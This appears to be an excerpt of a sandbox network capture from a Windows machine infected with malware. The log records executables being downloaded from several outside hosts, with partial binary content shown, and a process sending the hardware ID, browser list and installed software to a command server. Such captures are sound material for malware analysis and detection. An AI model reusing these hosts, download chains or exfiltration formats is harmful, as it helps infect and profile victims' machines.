Dec 24, 2023 10:44:39.558470011 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:39 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=evkk58sd2h8hoi7h6vni65bh7d; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49729	195.158.3.162	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:39.798522949 CET	164	OUT	GET /ftp/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: ftpvoyager.cc
Dec 24, 2023 10:44:40.399023056 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 24 Dec 2023 09:44:40 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=96c4e674.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 46 1e c9 bd 27 70 9a bd 27 70 9a bd 27 70 9a a3 75 f4 9a 95 27 70 9a a3 75 e5 9a a7 27 70 9a a3 75 f3 9a 33 27 70 9a 9a e1 0b 9a ba 27 70 9a bd 27 71 9a 3c 27 70 9a a3 75 fa 9a bc 27 70 9a a3 75 e4 9a bc 27 70 9a a3 75 e1 9a bc 27 70 9a 52 69 63 68 bd 27 70 9a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 15 ad 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 02 00 00 d6 01 00 00 00 00 00 6a 1f 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 b3 c4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 2d 03 00 50 00 00 00 00 c0 03 00 20 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 66 e5 02 00 00 10 00 00 00 e6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 3a 00 00 00 00 03 00 00 3a 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 fc 67 00 00 00 40 03 00 00 26 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 6f 76 6f 74 00 00 41 02 00 00 00 b0 03 00 00 04 00 00 00 4a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 24 01 00 00 c0 03 00 00 26 01 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$F'p'p'pu'pu'pu3'p'p'q<'pu'pu'pu'pRich'pPELcj@-P $.textf `.rdata::@@.datag@&$@.yovotAJ@.rsrc $&N@@
Dec 24, 2023 10:44:40.399086952 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d9 ee e9 bb 68 02 00 cc cc cc cc cc cc cc cc cc d9 ee 83 ec Data Ascii: h$Sg%C%C%C%C%C%hC%C%C% C%$C%(C%,C%0C%4C%8C%<C%@C%DC%HC%LC%PC%TC%XC%\C%`
Dec 24, 2023 10:44:40.399127960 CET	348	IN	Data Raw: 10 26 43 00 e8 cb 23 00 00 33 db 89 5d e4 33 c0 8b 7d 08 3b fb 0f 95 c0 3b c3 75 1c e8 58 1b 00 00 c7 00 16 00 00 00 53 53 53 53 53 e8 c5 1a 00 00 83 c4 14 33 c0 eb 79 33 c0 8b 75 0c 3b f3 0f 95 c0 3b c3 74 d6 33 c0 38 1e 0f 95 c0 3b c3 74 cb e8 Data Ascii: &C#3]3};;uXSSSSS3y3u;;t38;tPE;u]8u jEPh@CQPuVWLEEEc#u"YUj@uu*]UVW}3;uj_VVV
Dec 24, 2023 10:44:40.402462959 CET	1286	IN	Data Raw: 8b 75 0c 57 8b 7d 10 3b fb 74 24 3b f3 75 20 e8 09 1a 00 00 53 53 53 53 53 c7 00 16 00 00 00 e8 76 19 00 00 83 c4 14 83 c8 ff e9 93 00 00 00 c7 45 ec 42 00 00 00 89 75 e8 89 75 e0 81 ff ff ff ff 3f 76 09 c7 45 e4 ff ff ff 7f eb 06 8d 04 3f 89 45 Data Ascii: uW};t$;u SSSSSvEBuu?vE?EuEuuPUE;tU;\|BMxEEEPSYYt"MxEEPSYYtE39]fD~HH_^[Uujuuuhg@}]U
Dec 24, 2023 10:44:40.733918905 CET	1286	IN	Data Raw: c6 74 da 89 01 33 c0 5e 5d c3 8b ff 55 8b ec 83 3d 30 23 43 00 00 74 19 68 30 23 43 00 e8 04 85 00 00 59 85 c0 74 0a ff 75 08 ff 15 30 23 43 00 59 e8 3a 84 00 00 68 34 02 43 00 68 18 02 43 00 e8 29 ff ff ff 59 59 85 c0 75 42 68 74 9f 40 00 e8 b8 Data Ascii: t3^]U=0#Cth0#CYtu0#CY:h4ChC)YYuBht@C$C=CYthCYtjjjC3]jh0&CjYe3C90cC,cCE(cC}5C?xY}tx5C*xYu
Dec 24, 2023 10:44:40.734543085 CET	1286	IN	Data Raw: 15 f8 00 43 00 a3 90 63 43 00 6a 01 e8 6e 93 00 00 59 6a 00 ff 15 f4 00 43 00 68 88 02 43 00 ff 15 f0 00 43 00 83 3d 90 63 43 00 00 75 08 6a 01 e8 4a 93 00 00 59 68 09 04 00 c0 ff 15 ec 00 43 00 50 ff 15 e8 00 43 00 c9 c3 8b ff 55 8b ec 51 56 8b Data Ascii: CcCjnYjChCC=cCujJYhCPCUQVuVEFYuN /@t"S3t^NFFF^]u, ;t@;uuYuVFYF
Dec 24, 2023 10:44:40.734627962 CET	1286	IN	Data Raw: 00 00 83 8d e8 fd ff ff ff e9 96 08 00 00 8b 85 e8 fd ff ff 6b c0 0a 0f be ca 8d 44 08 d0 89 85 e8 fd ff ff e9 7b 08 00 00 80 fa 49 74 55 80 fa 68 74 44 80 fa 6c 74 18 80 fa 77 0f 85 63 08 00 00 81 8d f0 fd ff ff 00 08 00 00 e9 54 08 00 00 80 3b Data Ascii: kD{ItUhtDltwcT;luC9- !<6u{4uCC<3u{2uCC<d<i<o<u<x<X
Dec 24, 2023 10:44:40.734667063 CET	1286	IN	Data Raw: fe 75 18 8d 85 a4 fd ff ff 50 53 ff 35 08 46 43 00 e8 f0 69 00 00 59 ff d0 59 59 80 3b 2d 75 11 81 8d f0 fd ff ff 00 01 00 00 43 89 9d e4 fd ff ff 53 e9 03 fe ff ff c7 85 e8 fd ff ff 08 00 00 00 89 8d b8 fd ff ff eb 24 83 e8 73 0f 84 b6 fc ff ff Data Ascii: uPS5FCiYYY;-uCS$sHH'iQ0EK t@tGGG@t3@t;\|;
Dec 24, 2023 10:44:40.738701105 CET	1286	IN	Data Raw: 00 8d 85 28 fd ff ff 50 ff 15 f0 00 43 00 85 c0 75 0c 85 db 75 08 6a 02 e8 50 84 00 00 59 68 17 04 00 c0 ff 15 ec 00 43 00 50 ff 15 e8 00 43 00 8b 4d fc 33 cd 5b e8 d7 e1 ff ff c9 c3 8b ff 55 8b ec 56 ff 35 64 66 43 00 e8 b2 64 00 00 ff 75 08 8b Data Ascii: (PCuujPYhCPCM3[UV5dfCdu-dYYdfC^]5dfCdYU]U5dfCtdYt]jY]s3PPPPPU]UE3;@CtA-rHwjX]@C]Dj
Dec 24, 2023 10:44:40.738874912 CET	1286	IN	Data Raw: ff ff 83 c4 14 5d c3 8b ff 55 8b ec 51 53 33 db 39 5d 14 75 20 e8 df fb ff ff 53 53 53 53 53 c7 00 16 00 00 00 e8 4c fb ff ff 83 c4 14 83 c8 ff e9 d6 00 00 00 56 8b 75 08 57 39 5d 10 75 10 3b f3 75 10 39 5d 0c 75 12 33 c0 e9 ba 00 00 00 3b f3 74 Data Ascii: ]UQS39]u SSSSSLVuW9]u;u9]u3;t};wuuu;}v-8E@PVh@uL]8"ueS8\WVh@E\>u}u'8"u/M#;}"u
Dec 24, 2023 10:44:40.738943100 CET	1286	IN	Data Raw: 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 eb d7 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 db d7 ff ff 8b 45 08 f6 40 04 66 0f 85 16 01 00 00 8b 4d 10 8d 55 e8 89 53 fc 8b 5b 0c 89 45 e8 89 4d ec 83 fb fe 74 5f 8d 49 00 Data Ascii: E{tN38NF38E@fMUS[EMt_I[LDEEt-E\|@GEu}t$tN38hNV3:XE_^[]EM9csmu)=Ct hC#ftUjRC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49732	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:42.609472036 CET	240	OUT	POST /defenders HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 72 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Windows Defender
Dec 24, 2023 10:44:42.950531006 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:42 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=f77ibf6040e68rkrcdc0e143l1; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49733	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:43.237346888 CET	379	OUT	POST /browsers HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 211 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 4d 6f 7a 69 6c 6c 61 20 46 69 72 65 66 6f 78 20 7c 20 76 65 72 2e 20 31 31 38 2e 30 2e 31 2e 38 36 37 30 3b 0d 0a 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 3b 0d 0a 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 7c 20 76 65 72 2e 20 31 31 2e 30 2e 31 39 30 34 31 2e 31 35 36 36 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 7c 20 76 65 72 2e 20 31 31 37 2e 30 2e 32 30 34 35 2e 34 37 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Mozilla Firefox \| ver. 118.0.1.8670;Google Chrome \| ver. 117.0.5938.132;Internet Explorer \| ver. 11.0.19041.1566;Microsoft Edge \| ver. 117.0.2045.47;
Dec 24, 2023 10:44:43.577321053 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:43 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=spsae5k8qdsi14h9jev56eu9mn; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49734	172.67.168.30	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:43.377906084 CET	171	OUT	GET /order/tuc5.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cream.hitsturbo.com
Dec 24, 2023 10:44:43.803365946 CET	761	IN	HTTP/1.1 200 OK Date: Sun, 24 Dec 2023 09:44:43 GMT Content-Type: application/octet-stream Content-Length: 6817190 Connection: keep-alive Content-Description: File Transfer Content-Disposition: attachment; filename=tuc5.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vMX5MnVX%2FIPSFvIVYgS5kJzU5%2F1YtrfVQmBChl%2FqPltJGbH1M6MbfjcJS7tf7nGGFCt6cXPe5FZrN3MInImpIksLVQeZj8cWnmitrDURv0dCMPjAztJNpcwoPKChRGUTE6ROOaqA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83a7e8478b5c259d-MIA alt-svc: h3=":443"; ma=86400
Dec 24, 2023 10:44:43.803381920 CET	1286	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 Data Ascii: MZP@!L!This program must be run under Win32$7
Dec 24, 2023 10:44:43.803436041 CET	1286	IN	Data Raw: 6f 64 41 64 64 72 65 73 73 11 00 3c 2a 40 00 0a 4d 65 74 68 6f 64 4e 61 6d 65 13 00 78 2a 40 00 0c 46 69 65 6c 64 41 64 64 72 65 73 73 15 00 c4 29 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 12 00 ac 28 40 00 0b 4e 65 77 49 6e 73 74 61 6e Data Ascii: odAddress<@MethodNamex@FieldAddress)@DefaultHandler(@NewInstance(@FreeInstanceTObject@@% @%@%@%@%@%@%@%(@%@%@%@%@%@%@%@%@
Dec 24, 2023 10:44:43.803504944 CET	1286	IN	Data Raw: 08 8b 7e 0c 03 fb 3b eb 76 02 8b dd 3b 7c 24 08 76 04 8b 7c 24 08 3b fb 76 1e 6a 04 68 00 10 00 00 2b fb 57 53 e8 26 fc ff ff 85 c0 75 0a 8b 44 24 04 33 d2 89 10 eb 0a 8b 36 81 fe 3c c4 40 00 75 bc 83 c4 0c 5d 5f 5e 5b c3 8b c0 53 56 57 55 51 8b Data Ascii: ~;v;\|$v\|$;vjh+WS&uD$36<@u]_^[SVWUQ4$$+$A5<@8^~;$s$;s;vh@+WSu@6<@uZ]_^[@SVWUL@?]3;{,
Dec 24, 2023 10:44:43.803524017 CET	1286	IN	Data Raw: c3 90 8b 15 78 c4 40 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 78 c4 40 00 75 e8 c7 05 18 c4 40 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 a1 01 00 00 5b c3 83 fa 04 Data Ascii: x@J;rJ;rx@u@3S\|[\|[@@\|\| SVt@+3t@
Dec 24, 2023 10:44:43.803642035 CET	1286	IN	Data Raw: 58 f2 ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f 93 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 74 c4 40 00 8b 54 82 f4 85 d2 74 79 8b ca 8b c1 03 c3 83 20 fe 8b 42 04 3b d0 75 1a 8b c3 85 c0 79 03 83 c0 Data Ascii: X}yt@Tty B;uy5t@3\|&y=t@D2uuFu0RE@@;l@J)l@=l@}l@3l@p@p@E
Dec 24, 2023 10:44:43.803657055 CET	1286	IN	Data Raw: fd ff ff 84 c0 74 05 89 5d fc eb 37 8b c6 e8 a3 fa ff ff 8b f8 8b c3 83 e8 04 8b 00 25 fc ff ff 7f 83 e8 04 3b f0 7d 02 8b c6 85 ff 74 12 8b c8 8b d7 8b c3 e8 2d 01 00 00 8b c3 e8 fe fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 89 25 40 00 80 3d Data Ascii: t]7%;}t-}3ZYYdh%@=2@th@uE_^[Y]t@tjt@uRt2tP@Yt.@utP@Yt
Dec 24, 2023 10:44:43.803771973 CET	1286	IN	Data Raw: 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ee 49 75 f1 8b 46 02 5f 5e 5b c3 8b c0 53 56 57 89 cf 31 db 31 c9 8b 70 dc 85 f6 74 13 66 8b 0e 83 c6 02 3b 56 02 74 13 66 8b 1e 01 de 49 75 f3 8b 40 ec 85 c0 75 df 88 07 eb 0a 83 c6 06 31 c9 8a 0e 41 f3 a4 5f 5e Data Ascii: \2uIuF_^[SVW11ptf;VtfIu@u1A_^[SVW11Pptf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=@vj
Dec 24, 2023 10:44:43.803786039 CET	1286	IN	Data Raw: 90 00 00 00 00 8b 0a 89 88 00 00 00 00 8b 42 08 e8 e5 f9 ff ff 5a 8b 64 24 2c 31 c0 59 64 89 08 58 5d e8 7b fc ff ff ff e2 c3 31 d2 8b 4c 24 08 8b 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 89 14 24 e9 cd 0e 00 00 c3 8d 40 00 55 8b ec 8b Data Ascii: BZd$,1YdX]{1L$D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%RX]D$
Dec 24, 2023 10:44:43.803849936 CET	1286	IN	Data Raw: 42 fc e8 1d fe ff ff 89 c2 8b 03 89 13 8b 48 f8 49 7c 03 89 48 f8 8b 48 fc e8 36 f2 ff ff 8b 13 5b 89 d0 c3 53 85 c0 74 2d 8b 58 fc 85 db 74 26 4a 7c 1b 39 da 7d 1f 29 d3 85 c9 7c 19 39 d9 7f 11 01 c2 8b 44 24 08 e8 fc fd ff ff eb 11 31 d2 eb e5 Data Ascii: BHI\|HH6[St-Xt&J\|9})\|9D$1D$[tVSVWURtRO}19~k-X9u/H)]_^[SVW1tHt#xuPXp0
Dec 24, 2023 10:44:43.803899050 CET	1286	IN	Data Raw: fb 00 01 75 58 66 83 f8 08 75 0a 8b 45 ec e8 1b ff ff ff eb 52 66 c7 45 f0 00 00 8d 45 f0 66 b9 08 00 e8 97 fe ff ff 33 c0 55 68 8c 39 40 00 64 ff 30 64 89 20 8d 55 f0 8b 45 ec e8 ee fe ff ff 33 c0 5a 59 59 64 89 10 68 9d 39 40 00 8d 45 f0 e8 c1 Data Ascii: uXfuERfEEf3Uh9@d0d UE3ZYYdh9@EkEW[]f:uR5Sf$D$[@g@@P$@@@$@P@$@9@@3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49735	173.231.16.77	80	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:43.489723921 CET	133	OUT	GET /?format=dfg HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:44:43.677715063 CET	177	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Sun, 24 Dec 2023 09:44:43 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Vary: Origin Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 31 32 Data Ascii: 102.129.152.212

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49736	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:43.850054979 CET	472	OUT	POST /softwares HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 303 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 55 70 64 61 74 65 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 20 57 65 62 56 69 65 77 32 20 52 75 6e 74 69 6d 65 3b 0d 0a 4a 61 76 61 20 41 75 74 6f 20 55 70 64 61 74 65 72 3b 0d 0a 4a 61 76 61 20 38 20 55 70 64 61 74 65 20 33 38 31 3b 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 35 2d 32 30 32 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 34 2e 33 36 2e 33 32 35 33 32 3b 0d 0a 4f 66 66 69 63 65 20 31 36 20 43 6c 69 63 6b 2d 74 6f 2d 52 75 6e 20 45 78 74 65 6e 73 69 62 69 6c 69 74 79 20 43 6f 6d 70 6f 6e 65 6e 74 3b 0d 0a Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&name=Google Chrome;Microsoft Edge;Microsoft Edge Update;Microsoft Edge WebView2 Runtime;Java Auto Updater;Java 8 Update 381;Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532;Office 16 Click-to-Run Extensibility Component;
Dec 24, 2023 10:44:44.180780888 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:44 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=7nh75cpfvrepni7fnefkjnbnjs; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49737	91.92.254.7	80	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:43.975970984 CET	172	OUT	GET /scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 91.92.254.7 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:44:44.555012941 CET	204	IN	HTTP/1.1 200 OK Date: Sun, 24 Dec 2023 09:44:44 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49738	5.42.64.35	80	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:44.929733992 CET	130	OUT	GET /syncUpd.exe HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 5.42.64.35 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:44:45.173654079 CET	1286	IN	HTTP/1.1 200 OK Date: Sun, 24 Dec 2023 09:44:45 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sun, 24 Dec 2023 09:30:02 GMT ETag: "4cc00-60d3e1802f34d" Accept-Ranges: bytes Content-Length: 314368 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 46 1c c9 bd 27 72 9a bd 27 72 9a bd 27 72 9a a3 75 f6 9a 95 27 72 9a a3 75 e7 9a a7 27 72 9a a3 75 f1 9a 33 27 72 9a 9a e1 09 9a ba 27 72 9a bd 27 73 9a 3f 27 72 9a a3 75 f8 9a bc 27 72 9a a3 75 e6 9a bc 27 72 9a a3 75 e3 9a bc 27 72 9a 52 69 63 68 bd 27 72 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 1d 4b 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 3e 03 00 00 d6 01 00 00 00 00 00 6a 1f 00 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 22 00 00 04 00 00 bb e5 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 7d 03 00 50 00 00 00 00 10 04 00 20 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 